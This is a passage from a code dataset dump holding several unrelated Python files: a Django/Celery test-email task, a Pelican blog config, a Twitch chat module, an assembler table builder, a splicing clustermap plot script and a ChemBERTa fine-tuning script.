EmailUser\nfrom django.core.mail import EmailMultiAlternatives, get_connection\nfrom django.template.loader import render_to_string\nfrom celery.exceptions import SoftTimeLimitExceeded\n\n# What to do about max-retries\n@shared_task(bind=True, max_retries=0, rate_limit='1/s', time_limit=10)\ndef task_send_test_email(self, user_id):\n user = EmailUser.objects.get(id=user_id)\n try:\n connection = get_connection(\n backend='django.core.mail.backends.smtp.EmailBackend',\n host=user.smtp_host,\n port='587',\n username=user.smtp_user,\n password=user.smtp_credentials,\n use_tls=True\n )\n\n template_html = 'test/test_smtp.html',\n template_text = 'test/test_smtp.txt',\n body_html = render_to_string(template_html)\n body_text = render_to_string(template_text)\n\n msg = EmailMultiAlternatives(\n subject='CurrentClient Test Email',\n body='If you got this, i think it worked.',\n from_email=user.smtp_user,\n to=[user.smtp_user],\n connection=connection)\n\n msg.attach_alternative(body_html, \"text/html\")\n msg.mixed_subtype = 'related'\n\n msg.send()\n return 'good'\n except SoftTimeLimitExceeded as e:\n print('timeout--exceeded, user > ', user.id)\n return e\n except Exception as e:\n print('______fail', e)\n return e\n","sub_path":"apps/accounts/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"321543004","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Brandon Brown'\nSITENAME = 'Δ ℚuantitative √ourney'\nSITEURL = 'http://outlace.com'\n\nPATH = 'content'\n\nTIMEZONE = 'America/Los_Angeles'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\n#FEED_ALL_RSS = 'feeds/all.rss.xml'\n#CATEGORY_FEED_RSS = 'feeds/%s.rss.xml'\nFEED_ALL_ATOM = 'feeds/all.atom.xml'\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\n'''LINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)'''\n\n# Social widget\n'''SOCIAL = (('twitter', 'http://twitter.com/ametaireau'),\n ('lastfm', 'http://lastfm.com/user/akounet'),\n ('github', 'http://github.com/ametaireau'),)'''\n\nDEFAULT_PAGINATION = 6\nDEFAULT_ORPHANS = 0\nPAGINATION_PATTERNS = (\n (1, '{base_name}/', '{base_name}/index.html'),\n (2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'),\n)\n\nTHEME = 'blue-penguin'\n\nMARKUP = ('md', 'ipynb')\n\nSTATIC_PATHS = ['images', 'pdfs', 'pages', 'js', 'extra/CNAME', 'notebooks']\nEXTRA_PATH_METADATA = {'extra/CNAME': {'path': 'CNAME'},}\nSTATIC_IMG = 'images'\nCONTACT_EMAIL = 'outlacedev@gmail.com'\n\nPLUGIN_PATHS = ['./plugins']\nPLUGINS = ['ipynb.markup', 'render_math', 'pelican_alias']\nIPYNB_USE_META_SUMMARY = True\nIGNORE_FILES = ['.ipynb_checkpoints', '__pycache__']\n\nDISPLAY_PAGES_ON_MENU = True\nDISQUS_SITENAME = \"outlace\"\nGOOGLE_ANALYTICS = 'UA-65814776-1'\nGITHUB_URL = 'http://github.com/outlace'\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = False\nTYPOGRIFY = False\nTYPOGRIFY_IGNORE_TAGS = ['h2', 'article', 'a']\nCSS_FILE = 'main.css'\nSUMMARY_MAX_LENGTH = 250\n\n\n#### BLUE-PENGUIN THEME SETTINGS ########\n\n# all the following settings are *optional*\n\n# all defaults to True.\nDISPLAY_HEADER = True\nDISPLAY_FOOTER = True\nDISPLAY_HOME = True\nDISPLAY_MENU = True\n\n# provided as examples, they make ‘clean’ urls. used by MENU_INTERNAL_PAGES.\n'''TAGS_URL = 'tags'\nTAGS_SAVE_AS = 'tags/index.html'\nAUTHORS_URL = 'authors'\nAUTHORS_SAVE_AS = 'authors/index.html'\nCATEGORIES_URL = 'categories'\nCATEGORIES_SAVE_AS = 'categories/index.html'\nARCHIVES_URL = 'archives'\nARCHIVES_SAVE_AS = 'archives/index.html'''\n\nTAG_URL = 'tag/{slug}/'\nTAG_SAVE_AS = 'tag/{slug}/index.html'\nTAGS_URL = 'tags/'\nTAGS_SAVE_AS = 'tags/index.html'\n\nAUTHOR_URL = 'author/{slug}/'\nAUTHOR_SAVE_AS = 'author/{slug}/index.html'\nAUTHORS_URL = 'authors/'\nAUTHORS_SAVE_AS = 'authors/index.html'\n\nCATEGORY_URL = 'category/{slug}/'\nCATEGORY_SAVE_AS = 'category/{slug}/index.html'\nCATEGORIES_URL = 'categories/'\nCATEGORIES_SAVE_AS = 'categories/index.html'\n\nARCHIVES_URL = 'archives/{slug}/'\nARCHIVES_SAVE_AS = 'archives/{slug}/index.html'\n\n# use those if you want pelican standard pages to appear in your menu\nMENU_INTERNAL_PAGES = (\n #('About', AUTHORS_URL, AUTHORS_SAVE_AS),\n ('Tags', TAGS_URL, TAGS_SAVE_AS),\n ('Categories', CATEGORIES_URL, CATEGORIES_SAVE_AS),\n ('Archives', ARCHIVES_URL, ARCHIVES_SAVE_AS),\n)\n# additional menu items\nMENUITEMS = (\n #('GitHub', 'https://github.com/outlace'),\n)\n\nSITESUBTITLE = '∑ Our experiences in learning quantitative applications'\n\n#FAVICON = 'images/Deep_learning_icon.png'\n#ICON = 'images/Deep_learning_icon.png'\n","sub_path":"pelican/pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"473331205","text":"\n\n \nresult = [\n ['姓名', '性别', '年龄'],\n ['张三11111111111111111', '男', 186],\n ['李四', '男', 18],\n ['小花', '女', 16],\n ['梅梅', '女', 14],\n ]\n\ndef len_byte(value):\n print(value.encode('utf-8'))\n length = len(value)\n utf8_length = len(value.encode('utf-8'))\n print(length,utf8_length)\n length = (utf8_length - length) / 2 + length\n return int(length)\n\ncol_width = []\nfor i in range(len(result)):\n for j in range(len(result[i])):\n if i == 0:\n col_width.append(len_byte(result[i][j]))\n else:\n if col_width[j] < len_byte(str(result[i][j])):\n col_width[j] = len_byte(result[i][j])\n\n\nprint(col_width)","sub_path":"tmptest.py","file_name":"tmptest.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"310539087","text":"import json\n\nfrom utilities import messagetypes\nfrom modules.utilities.twitchviewer import TwitchViewer\n\n# DEFAULT MODULE VARIABLES\npriority = 5\ninterpreter = None\nclient = None\n\n# MODULE SPECIFIC VARIABLES\ntwitchviewer = None\ntwitch_cfg = \"twitch_data\"\n\n# HELPER FUNCTIONS\ndef get_configuration():\n\ttry:\n\t\tfile = open(twitch_cfg, \"r\")\n\t\tcfg = json.load(file)\n\t\tfile.close()\n\t\treturn cfg\n\texcept FileNotFoundError: return {}\n\ndef check_active_viewer():\n\tglobal twitchviewer\n\tif twitchviewer is not None and twitchviewer.is_alive: return True\n\ttwitchviewer = None\n\treturn False\n\n# MODULE COMMANDS\ndef command_twitch(arg, argc, limit=False):\n\tglobal twitchviewer\n\tif argc == 1:\n\t\tif not check_active_viewer():\n\t\t\ttwitchviewer = TwitchViewer(client, get_configuration(), arg[0])\n\t\t\ttwitchviewer.set_limited(limit)\n\t\t\ttwitchviewer.chat.set_command_queue_callback(interpreter.queue.put_nowait)\n\t\t\treturn messagetypes.Reply(\"Twitch viewer for '\"+ arg[0] + \"' started\")\n\t\telse: return messagetypes.Reply(\"Twitch viewer already open, close that one first\")\n\ndef command_twitch_limited(arg, argc):\n\tif argc == 1: return command_twitch(arg, argc, limit=True)\n\ndef command_twitch_reload(arg, argc):\n\tif argc == 0:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.set_configuration(get_configuration())\n\t\t\treturn messagetypes.Reply(\"Twitch configuration reloaded\")\n\t\treturn messagetypes.Reply(\"No twitch viewer open\")\n\ndef command_twitch_trigger_enable(arg, argc):\n\tif argc == 1:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.chat.enable_triggers = True\n\t\t\treturn messagetypes.Reply(\"Command triggers enabled\")\n\ndef command_twitch_trigger_disable(arg, argc):\n\tif argc == 1:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.chat.enable_triggers = False\n\t\t\treturn messagetypes.Reply(\"Command triggers disabled\")\n\ndef command_twitch_say(arg, argc):\n\tif argc > 0:\n\t\tif check_active_viewer():\n\t\t\ttwitchviewer.chat.send_message(\" \".join(arg))\n\t\t\treturn messagetypes.Reply(\"Message sent\")\n\t\treturn messagetypes.Reply(\"No twitch viewer open\")\n\ncommands = {\n\t\"twitch\": {\n\t\t\"\": command_twitch,\n\t\t\"limited\": command_twitch_limited,\n\t\t\"reload\": command_twitch_reload,\n\t\t\"trigger\": {\n\t\t\t\"disable\": command_twitch_trigger_disable,\n\t\t\t\"enable\": command_twitch_trigger_enable\n\t\t}, \"say\": command_twitch_say\n\t}\n}","sub_path":"modules/twitch.py","file_name":"twitch.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"287862681","text":"def IntermediateTable(list1,symbol_table,label_table,lit_table):\n list2 = list1 \n reg32 = ['eax','ecx','edx','ebx','esp','ebp','esi','edi']\n reg32_1 = ['eax,','ecx,','edx,','ebx,','esp,','ebp,','esi,','edi,']\n for i in range(len(list1)):\n for j in range(len(list1[i])):\n temp = list2[i][j]\n if temp in reg32:\n list2[i][j] = 'reg#' + str(reg32.index(temp) + 1)\n if temp in reg32_1:\n list2[i][j] = 'reg#' + str(reg32_1.index(temp) + 1) + ','\n for k in range(len(symbol_table)):\n if temp == symbol_table[k][1]:\n list2[i][j] = 'sym#' + str(k+1)\n for k in range(len(label_table)):\n if (temp == label_table[k][2]) or (temp == label_table[k][2] + ':'):\n list2[i][j] = label_table[k][1]\n for k in range(len(lit_table)):\n if temp == lit_table[k][2]:\n list2[i][j] = lit_table[k][1]\n \n with open('IntermediateTable.txt','w+') as f:\n for i in range(len(list2)):\n list2[i] = ' '.join(list2[i]) + '\\n'\n f.write(list2[i])\n \n","sub_path":"IntermediateTable.py","file_name":"IntermediateTable.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313862258","text":"import matplotlib\nmatplotlib.use('Agg')\nimport pylab as plt\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.patches as mpatches\nfrom sklearn import preprocessing\nimport scipy\nimport os\n\n#cmap = sns.light_palette('brown', as_cmap=True)\ncmap = matplotlib.colors.ListedColormap(sns.color_palette('coolwarm', 1000))\n\n\ndef clustermap(inF, inF2, xLabel=True, yLabel=True, yLabelSize=8, xLabelSize=8):\n SigGene = []\n inFile = open(inF2)\n head = inFile.readline()\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n k = fields[1] + ':' + fields[3][1:]\n SigGene.append(k)\n print(fields[2])\n inFile.close()\n \n df = pd.read_table(inF, header=0)\n df_sig = df.ix[df.ix[:,0].isin(SigGene),:]\n\n PSIidx = -1\n for item in df_sig.columns:\n if item[-4:] == '_PSI':\n PSIidx += 1\n break\n else:\n PSIidx += 1\n print(PSIidx)\n mat = df_sig.ix[:,PSIidx:df_sig.shape[1]] \n\n CL = [x.split('_PSI')[0] for x in mat.columns]\n mat.columns = CL\n mat.columns.name=None\n\n COL_COLORS= []\n\n for sample in mat.columns:\n #if sample in ['B498','B499','B500', 'B502', 'B509']:\n # COL_COLORS.append('r')\n #elif sample in ['B505','B506','B507','B508']:\n # COL_COLORS.append('m')\n #elif sample in ['B501', 'B503','B504']:\n # COL_COLORS.append('g')\n if sample.find('Het') != -1:\n COL_COLORS.append('r')\n else:\n COL_COLORS.append('b')\n\n if yLabel:\n mat.index = df_sig.ix[:,5]\n mat.index.name = None\n\n #mat.to_csv(inF + '.txt',sep='\\t', index=True, header=True, float_format='%.2f')\n \n #row_linkage = scipy.cluster.hierarchy.linkage(mat).clip(0)\n #col_linkage = scipy.cluster.hierarchy.linkage(mat.T).clip(0)\n\n #cm =sns.clustermap(mat, col_cluster=True,row_cluster=True, linewidths=0, standard_scale=0, cmap = cmap, row_linkage=row_linkage, col_linkage=col_linkage)\n cm =sns.clustermap(mat, col_cluster=True,row_cluster=True, linewidths=0, standard_scale=0, cmap = cmap, col_colors=COL_COLORS)\n #cm =sns.clustermap(mat, col_cluster=True,row_cluster=True, linewidths=0, z_score=0, cmap = cmap, col_colors=COL_COLORS)\n\n \n hm = cm.ax_heatmap.get_position()\n rd = cm.ax_row_dendrogram.get_position()\n cd = cm.ax_col_dendrogram.get_position()\n ca = cm.cax.get_position()\n cc = cm.ax_col_colors.get_position()\n \n if not xLabel:\n cm.ax_heatmap.set_xticklabels('')\n if not yLabel:\n cm.ax_heatmap.set_yticklabels('')\n \n cm.ax_heatmap.set_position([hm.x0-0.05, hm.y0+0.05, hm.width, hm.height])\n cm.ax_col_dendrogram.set_position([cd.x0-0.05, cd.y0+0.05, cd.width, cd.height])\n cm.ax_row_dendrogram.set_position([rd.x0-0.05, rd.y0+0.05, rd.width, rd.height])\n cm.cax.set_position([ca.x0-0.05, ca.y0+0.05, ca.width, ca.height])\n cm.ax_col_colors.set_position([cc.x0-0.05, cc.y0 + 0.05, cc.width, cc.height])\n\n cm.cax.yaxis.set_label_text('standardized PSI')\n plt.setp(cm.ax_heatmap.yaxis.get_majorticklabels(), fontsize=yLabelSize, rotation=0)\n plt.setp(cm.ax_heatmap.xaxis.get_majorticklabels(), rotation=90, fontsize=xLabelSize)\n\n LEGEND = []\n #LEGEND.append(mpatches.Patch(color='r', label='R636Shom'))\n #LEGEND.append(mpatches.Patch(color='m', label='R636Shet'))\n #LEGEND.append(mpatches.Patch(color='g', label='KOhet'))\n #LEGEND.append(mpatches.Patch(color='b', label='WT'))\n LEGEND.append(mpatches.Patch(color='r', label='Het'))\n LEGEND.append(mpatches.Patch(color='b', label='WT'))\n cm.ax_heatmap.legend(handles = LEGEND, bbox_to_anchor=[-0.08, 0.02], loc='upper right')\n\n plt.savefig(inF2.split('.txt')[0] + '_Clustermap.pdf')\n\nclustermap('DCM_WTC_Exons_IRER.psi', inF2='DCM_WTC_DEXSeq_Sig_exonBaseMean64_PSI0.1_TopExon.txt', xLabel=True, yLabel=True, yLabelSize=20, xLabelSize=12)\n","sub_path":"DEXSeqPSI/14-Clustermap.py","file_name":"14-Clustermap.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"87557022","text":"\"\"\"Script for finetuning and evaluating pre-trained ChemBERTa models on MoleculeNet tasks.\n\n[classification]\npython finetune.py --datasets=bbbp --pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015\n\n[regression]\npython finetune.py --datasets=delaney --pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015\n\n[csv]\npython finetune.py --datasets=$HOME/finetune_datasets/logd/ \\\n --dataset_types=regression \\\n --pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015 \\\n --is_molnet=False\n\n[multiple]\npython finetune.py \\\n--datasets=bace_classification,bace_regression,bbbp,clearance,clintox,delaney,lipo,tox21 \\\n--pretrained_model_name_or_path=DeepChem/ChemBERTa-SM-015 \\\n--n_trials=20 \\\n--output_dir=finetuning_experiments \\\n--run_name=sm_015\n\n[from scratch (no pretraining)]\npython finetune.py --datasets=bbbp\n\n\"\"\"\nimport json\nimport os\nimport shutil\nimport tempfile\nfrom glob import glob\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torch\nfrom absl import app, flags\nfrom scipy.special import softmax\nfrom scipy.stats import pearsonr\nfrom sklearn.metrics import (\n average_precision_score,\n matthews_corrcoef,\n mean_squared_error,\n roc_auc_score,\n)\nfrom transformers import RobertaConfig, RobertaTokenizerFast, Trainer, TrainingArguments\nfrom transformers.trainer_callback import EarlyStoppingCallback\n\nfrom chemberta.finetune.utils import (\n get_finetune_datasets,\n get_latest_checkpoint,\n prune_state_dict,\n)\nfrom chemberta.utils.cloud import check_cloud, sync_with_s3\nfrom chemberta.utils.molnet_dataloader import get_dataset_info\nfrom chemberta.utils.roberta_regression import (\n RobertaForRegression,\n RobertaForSequenceClassification,\n)\n\nFLAGS = flags.FLAGS\n\n# Settings\nflags.DEFINE_string(name=\"output_dir\", default=\"default_dir\", help=\"\")\nflags.DEFINE_boolean(name=\"overwrite_output_dir\", default=True, help=\"\")\nflags.DEFINE_integer(name=\"seed\", default=0, help=\"Global random seed.\")\n\n# Model params\nflags.DEFINE_list(\n name=\"pretrained_paths\",\n default=None,\n help=\"list of pretrained models. can be local or cloud\",\n)\nflags.DEFINE_list(\n name=\"model_names\", default=None, help=\"list of names to assign to each model run\"\n)\nflags.DEFINE_boolean(\n name=\"is_molnet\",\n default=True,\n help=\"If true, assumes all dataset are MolNet datasets.\",\n)\n\n# Train params\nflags.DEFINE_integer(name=\"logging_steps\", default=10, help=\"\")\nflags.DEFINE_integer(name=\"early_stopping_patience\", default=5, help=\"\")\nflags.DEFINE_integer(name=\"per_device_train_batch_size\", default=64, help=\"\")\nflags.DEFINE_integer(name=\"per_device_eval_batch_size\", default=64, help=\"\")\nflags.DEFINE_integer(\n name=\"n_trials\",\n default=5,\n help=\"Number of different hyperparameter combinations to try. Each combination will result in a different finetuned model.\",\n)\nflags.DEFINE_integer(\n name=\"n_seeds\",\n default=5,\n help=\"Number of unique random seeds to try. This only applies to the final best model selected after hyperparameter tuning.\",\n)\nflags.DEFINE_integer(\n name=\"save_total_limit\",\n default=3,\n help=\"Total number of checkpoints to save per model configuration.\",\n)\n\n# Dataset params\nflags.DEFINE_list(\n name=\"datasets\",\n default=None,\n help=\"Comma-separated list of MoleculeNet dataset names.\",\n)\nflags.DEFINE_string(\n name=\"split\", default=\"scaffold\", help=\"DeepChem data loader split_type.\"\n)\nflags.DEFINE_list(\n name=\"dataset_types\",\n default=None,\n help=\"List of dataset types (ex: classification,regression). Include 1 per dataset, not necessary for MoleculeNet datasets.\",\n)\n\n# Tokenizer params\nflags.DEFINE_string(\n name=\"tokenizer_path\",\n default=\"seyonec/SMILES_tokenized_PubChem_shard00_160k\",\n help=\"\",\n)\nflags.DEFINE_integer(name=\"max_tokenizer_len\", default=512, help=\"\")\n\nflags.mark_flag_as_required(\"datasets\")\nflags.mark_flag_as_required(\"pretrained_paths\")\n\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\nos.environ[\"WANDB_DISABLED\"] = \"true\"\n\n\ndef main(argv):\n is_molnet = FLAGS.is_molnet\n\n for i, pretrained_model_dir in enumerate(FLAGS.pretrained_paths):\n if FLAGS.model_names is not None:\n model_name = FLAGS.model_names[i]\n else:\n model_name = f\"model_{i}\"\n # Check that CSV dataset has the proper flags\n if not is_molnet:\n print(\"Assuming each dataset is a folder containing CSVs...\")\n assert (\n len(FLAGS.dataset_types) > 0\n ), \"Please specify dataset types for csv datasets\"\n for dataset_folder in FLAGS.datasets:\n assert os.path.exists(os.path.join(dataset_folder, \"train.csv\"))\n assert os.path.exists(os.path.join(dataset_folder, \"valid.csv\"))\n assert os.path.exists(os.path.join(dataset_folder, \"test.csv\"))\n\n for i in range(len(FLAGS.datasets)):\n dataset_name_or_path = FLAGS.datasets[i]\n dataset_name = get_dataset_name(dataset_name_or_path)\n dataset_type = (\n get_dataset_info(dataset_name)[\"dataset_type\"]\n if is_molnet\n else FLAGS.dataset_types[i]\n )\n\n run_dir = os.path.join(FLAGS.output_dir, model_name, dataset_name)\n\n if os.path.exists(run_dir) and not FLAGS.overwrite_output_dir:\n print(f\"Run dir already exists for dataset: {dataset_name}\")\n else:\n print(f\"Finetuning on {dataset_name}\")\n finetune_model_on_single_dataset(\n pretrained_model_dir,\n dataset_name_or_path,\n dataset_type,\n run_dir,\n is_molnet,\n )\n\n\ndef check_cloud(path: str):\n \"\"\"Naive check to if the path is a cloud path\"\"\"\n if path.startswith(\"s3:\"):\n return True\n return False\n\n\ndef sync_with_s3(source_dir: str, target_dir: str):\n \"\"\"Sync source_dir directory with target_dir\"\"\"\n subprocess.check_call(\n [\n \"aws\",\n \"s3\",\n \"sync\",\n source_dir,\n target_dir,\n \"--acl\",\n \"bucket-owner-full-control\",\n \"--delete\",\n ]\n )\n return\n\n\ndef get_latest_checkpoint(saved_model_dir):\n \"\"\"Get the folder for the latest checkpoint\"\"\"\n iters = [\n int(x.split(\"-\")[-1]) for x in os.listdir(saved_model_dir) if \"checkpoint\" in x\n ]\n iters.sort()\n latest_checkpoint_dir = os.path.join(saved_model_dir, f\"checkpoint-{iters[-1]}\")\n return latest_checkpoint_dir\n\n\ndef prune_state_dict(model_dir):\n \"\"\"Remove problematic keys from state dictionary\"\"\"\n if not (model_dir and os.path.exists(os.path.join(model_dir, \"pytorch_model.bin\"))):\n return None\n\n state_dict_path = os.path.join(model_dir, \"pytorch_model.bin\")\n assert os.path.exists(\n state_dict_path\n ), f\"No `pytorch_model.bin` file found in {model_dir}\"\n loaded_state_dict = torch.load(state_dict_path)\n state_keys = loaded_state_dict.keys()\n keys_to_remove = [\n k for k in state_keys if k.startswith(\"regression\") or k.startswith(\"norm\")\n ]\n\n new_state_dict = OrderedDict({**loaded_state_dict})\n for k in keys_to_remove:\n del new_state_dict[k]\n return new_state_dict\n\n\ndef finetune_model_on_single_dataset(\n pretrained_model_dir: str,\n dataset_name: str,\n dataset_type: str,\n run_dir: str,\n is_molnet: bool,\n use_final: bool = False,\n):\n \"\"\"Pretrains a single model on a single dataset\n\n Args:\n pretrained_model_dir: local or cloud dir\n dataset_name: name of dataset\n dataset_type: regression or classification\n run_dir: directory for saving results\n is_molnet: whether or not it's a MolNet dataset\n use_final: whether or not to use `final` directory. otherwise, uses the latest checkpoint\n \"\"\"\n torch.manual_seed(FLAGS.seed)\n os.environ[\"WANDB_DISABLED\"] = \"true\"\n\n tokenizer = RobertaTokenizerFast.from_pretrained(\n FLAGS.tokenizer_path, max_len=FLAGS.max_tokenizer_len, use_auth_token=True\n )\n\n finetune_datasets = get_finetune_datasets(dataset_name, tokenizer, is_molnet)\n\n if check_cloud(pretrained_model_dir):\n local_dir = os.path.join(\n tempfile.gettempdir(), os.sep.join(pretrained_model_dir.split(os.sep)[2:])\n )\n print(f\"Syncing {pretrained_model_dir} to {local_dir}\")\n sync_with_s3(pretrained_model_dir, local_dir)\n\n else:\n local_dir = pretrained_model_dir\n\n if use_final:\n checkpoint_dir = os.path.join(local_dir, \"final\")\n\n else:\n checkpoint_dir = get_latest_checkpoint(local_dir)\n other_checkpoint_dirs = [\n os.path.join(local_dir, x)\n for x in os.listdir(local_dir)\n if \"checkpoint\" in x\n ]\n other_checkpoint_dirs.remove(checkpoint_dir)\n for dir in other_checkpoint_dirs:\n shutil.rmtree(dir, ignore_errors=True)\n\n assert os.path.isdir(\n checkpoint_dir\n ), f\"Could not find checkpoint dir {checkpoint_dir}\"\n\n config = RobertaConfig.from_pretrained(\n checkpoint_dir,\n )\n\n if dataset_type == \"classification\":\n config.num_labels = finetune_datasets.num_labels\n\n elif dataset_type == \"regression\":\n config.num_labels = 1\n config.norm_mean = finetune_datasets.norm_mean\n config.norm_std = finetune_datasets.norm_std\n\n state_dict = prune_state_dict(checkpoint_dir)\n\n def warmup_model_init():\n if dataset_type == \"classification\":\n model_class = RobertaForSequenceClassification\n elif dataset_type == \"regression\":\n model_class = RobertaForRegression\n\n model = model_class.from_pretrained(\n checkpoint_dir,\n config=config,\n state_dict=state_dict,\n use_auth_token=True,\n )\n for name, param in model.base_model.named_parameters():\n param.requires_grad = False\n\n return model\n\n # train for 2 epochs to get the final layer warmed-up\n warmup_dir = os.path.join(run_dir, \"warmup/\")\n warmup_model_dir = os.path.join(warmup_dir, \"warmed_up\")\n warmup_training_args = TrainingArguments(\n evaluation_strategy=\"epoch\",\n num_train_epochs=2,\n output_dir=warmup_dir,\n overwrite_output_dir=FLAGS.overwrite_output_dir,\n per_device_eval_batch_size=FLAGS.per_device_eval_batch_size,\n logging_steps=FLAGS.logging_steps,\n load_best_model_at_end=True,\n report_to=None,\n )\n warmup_trainer = Trainer(\n model_init=warmup_model_init,\n args=warmup_training_args,\n train_dataset=finetune_datasets.train_dataset,\n eval_dataset=finetune_datasets.valid_dataset,\n callbacks=[\n EarlyStoppingCallback(early_stopping_patience=FLAGS.early_stopping_patience)\n ],\n )\n warmup_trainer.train()\n warmup_trainer.save_model(warmup_model_dir)\n\n def hp_model_init():\n if dataset_type == \"classification\":\n model_class = RobertaForSequenceClassification\n elif dataset_type == \"regression\":\n model_class = RobertaForRegression\n\n # make sure to leave out the `state_dict` argument\n # since we actually want to use the saved final layer weights\n model = model_class.from_pretrained(\n warmup_model_dir,\n config=config,\n use_auth_token=True,\n )\n # make sure everything is trainable\n for name, param in model.base_model.named_parameters():\n param.requires_grad = True\n\n return model\n\n hp_training_args = TrainingArguments(\n evaluation_strategy=\"epoch\",\n num_train_epochs=100,\n output_dir=run_dir,\n overwrite_output_dir=FLAGS.overwrite_output_dir,\n per_device_eval_batch_size=FLAGS.per_device_eval_batch_size,\n logging_steps=FLAGS.logging_steps,\n load_best_model_at_end=True,\n report_to=None,\n save_total_limit=FLAGS.save_total_limit,\n )\n\n hp_trainer = Trainer(\n model_init=hp_model_init,\n args=hp_training_args,\n train_dataset=finetune_datasets.train_dataset,\n eval_dataset=finetune_datasets.valid_dataset,\n callbacks=[\n EarlyStoppingCallback(early_stopping_patience=FLAGS.early_stopping_patience)\n ],\n )\n\n def custom_hp_space_optuna(trial):\n return {\n \"learning_rate\": trial.suggest_float(\"learning_rate\", 1e-7, 1e-4, log=True),\n # \"num_train_epochs\": trial.suggest_int(\n # \"num_train_epochs\", 1, FLAGS.num_train_epochs_max\n # ),\n \"seed\": trial.suggest_int(\"seed\", 1, 40),\n \"per_device_train_batch_size\": trial.suggest_categorical(\n \"per_device_train_batch_size\", [FLAGS.per_device_train_batch_size]\n ),\n }\n\n best_trial = hp_trainer.hyperparameter_search(\n backend=\"optuna\",\n direction=\"minimize\",\n hp_space=custom_hp_space_optuna,\n n_trials=FLAGS.n_trials,\n )\n\n # Set parameters to the best ones from the hp search\n for n, v in best_trial.hyperparameters.items():\n setattr(hp_trainer.args, n, v)\n\n dir_valid = os.path.join(run_dir, \"results\", \"valid\")\n dir_test = os.path.join(run_dir, \"results\", \"test\")\n os.makedirs(dir_valid, exist_ok=True)\n os.makedirs(dir_test, exist_ok=True)\n\n metrics_valid = {}\n metrics_test = {}\n\n # Run with several seeds so we can see std\n for random_seed in range(FLAGS.n_seeds):\n setattr(hp_trainer.args, \"seed\", random_seed)\n setattr(hp_trainer.args, \"run_name\", f\"run_{random_seed}\")\n hp_trainer.train()\n metrics_valid[f\"seed_{random_seed}\"] = eval_model(\n hp_trainer,\n finetune_datasets.valid_dataset_unlabeled,\n dataset_name,\n dataset_type,\n dir_valid,\n random_seed,\n )\n metrics_test[f\"seed_{random_seed}\"] = eval_model(\n hp_trainer,\n finetune_datasets.test_dataset,\n dataset_name,\n dataset_type,\n dir_test,\n random_seed,\n )\n\n with open(os.path.join(dir_valid, \"metrics.json\"), \"w\") as f:\n json.dump(metrics_valid, f)\n with open(os.path.join(dir_test, \"metrics.json\"), \"w\") as f:\n json.dump(metrics_test, f)\n\n # Delete checkpoints/runs from hyperparameter search since they use a lot of disk\n for d in glob(os.path.join(run_dir, \"run-*\")):\n shutil.rmtree(d, ignore_errors=True)\n for d in glob(os.path.join(run_dir, \"checkpoint-*\")):\n shutil.rmtree(d, ignore_errors=True)\n shutil.rmtree(warmup_dir, ignore_errors=True)\n\n hp_trainer.save_state()\n hp_trainer.save_model(os.path.join(run_dir, \"final\"))\n\n\ndef eval_model(trainer, dataset, dataset_name, dataset_type, output_dir, random_seed):\n labels = dataset.labels\n predictions = trainer.predict(dataset)\n fig = plt.figure(dpi=144)\n\n if dataset_type == \"classification\":\n if len(np.unique(labels)) <= 2:\n y_pred = softmax(predictions.predictions, axis=1)[:, 1]\n metrics = {\n \"roc_auc_score\": roc_auc_score(y_true=labels, y_score=y_pred),\n \"average_precision_score\": average_precision_score(\n y_true=labels, y_score=y_pred\n ),\n }\n sns.histplot(x=y_pred, hue=labels)\n else:\n y_pred = np.argmax(predictions.predictions, axis=-1)\n metrics = {\"mcc\": matthews_corrcoef(labels, y_pred)}\n\n elif dataset_type == \"regression\":\n y_pred = predictions.predictions.flatten()\n metrics = {\n \"pearsonr\": pearsonr(y_pred, labels),\n \"rmse\": mean_squared_error(y_true=labels, y_pred=y_pred, squared=False),\n }\n sns.regplot(x=y_pred, y=labels)\n plt.xlabel(\"ChemBERTa predictions\")\n plt.ylabel(\"Ground truth\")\n else:\n raise ValueError(dataset_type)\n\n plt.title(f\"{dataset_name} {dataset_type} results\")\n plt.savefig(os.path.join(output_dir, f\"results_seed_{random_seed}.png\"))\n\n return metrics\n\n\ndef get_dataset_name(dataset_name_or_path):\n return os.path.splitext(os.path.basename(dataset_name_or_path))[0]\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","sub_path":"chemberta/finetune/finetune_multiple_with_freeze.py","file_name":"finetune_multiple_with_freeze.py","file_ext":"py","file_size_in_byte":16433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 